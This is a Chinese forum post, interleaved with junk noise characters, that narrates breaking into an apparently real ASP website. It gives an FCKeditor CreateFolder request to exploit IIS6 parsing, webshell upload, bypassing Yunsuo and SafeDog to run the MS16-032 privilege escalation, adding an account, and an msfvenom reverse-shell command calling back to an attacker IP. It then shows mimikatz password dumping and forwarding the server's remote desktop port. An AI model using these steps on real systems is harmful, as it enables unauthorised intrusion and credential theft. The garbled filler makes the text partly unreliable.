|
( T$ r. `2 P$ B/ |, x4 B( `
- |+ o: N, m' F# u' P6 L. f' n( t
, r$ O) I) K/ k" q/ V0 c
8 a$ k6 _7 o; w# A4 M | 8 V/ q4 k8 s# [$ c
% b* u5 w8 G/ W$ ?# }3 P% f3 j
8 p- _1 u1 J# M, i: Q一、 利用getwebshell篇
! q: Y0 L6 j' f/ `" ^9 B6 ?* Y
5 `7 f% w! G+ x! \/ |1 j首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
, h; e; B6 d& d
: T# v! A) @* H1 s! e m5 o4 s
8 y( C7 s* m7 \# z# m
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
, N+ x2 h. f' W
& a/ Z+ C% f; z; J" ^
下面我们构造一个asp目录,如:
% X( _& e" k/ f$ _- }. n+ Q' _
6 l( w# i/ T4 c6 |. [6 O ' `: ?: w, a! c# V; ~9 O
http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975
; E* y6 ?# S$ k; H/ Y9 H) E8 i
( s( Q" Z2 I* R- D8 s( x# |& o$ D& | 6 ]$ o5 U( n4 {' d" N4 J
然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
- _1 u7 w- v3 ]( T# c& v1 O
5 f7 `5 t, h' Z, d% ~7 _! @
一、 绕过安全狗云锁提权并且加账号
( K' `6 L, _, w
+ R# W% U0 N2 s4 u; y- P1 O没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
$ S2 o5 L7 K2 V( x; ^2 a
; V, y J) I7 {4 x- z, |5 Y# ]
如图:
! M$ w' ]) B! ?# u2 m; n
1 a# ]. `9 t% D; [
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
& F! {4 t; ^0 d7 C* f6 i
0 @4 u/ t; q' G0 D7 Z2 K一、 利用metasploit
' F+ T& n) P6 z4 h; U' N4 b) r, l
; U$ W4 n" Q' f1 c首先用pentestbox生成一个64位的payload如下命令
$ m" U5 ~! F3 {7 t2 X
2 Q% Z$ D4 s2 M: e" n
msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
: D, B/ l$ H3 l% O# M
( R7 H4 { R+ b$ j, ]* a6 D为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
2 Z: B, I: q2 ?$ Q* B( D' d1 n4 F
# K: q. W# P' C9 F/ ~下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图:
0 j: H& m8 r) E( Z* N7 D2 T
; l4 J' Q- b6 r- g下面我们来做一个监听如下命令:
: i; v6 m( w4 ~* D* Q
/ s# Q( I- o$ D; W: O9 dportfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图:
' x h" e4 G; x7 K5 g% v0 |& P' f3 [
3 E9 u# h" V$ R; K5 \
, C. i9 T+ j+ j/ t |
" e' C$ `' o4 @) q ) m9 g8 j" {/ x+ {7 p" W9 G
" q: R8 }* q- i* }( q' l
6 Z% V' d/ y* Q# b( L
( m0 \6 m" l( O( D* d( ^/ ?# J9 X: M* x) d* H- i& j
3 ?& K1 |8 x9 w
& @2 w5 S3 A2 z8 n# V @
! D5 \; V+ y& Z3 C3 x
8 g* J5 I: J& b/ d/ ]
% K6 ?4 \4 q0 f
& c+ C) C' H; k9 _* ]& M# y6 [
- s" e) b i# _* G( P
T3 S' S/ k4 h8 t( E ]
| 
发表于 2018-10-20 20:31:43
收藏
支持
反对
匿名
发表于 2021-11-20 23:30:06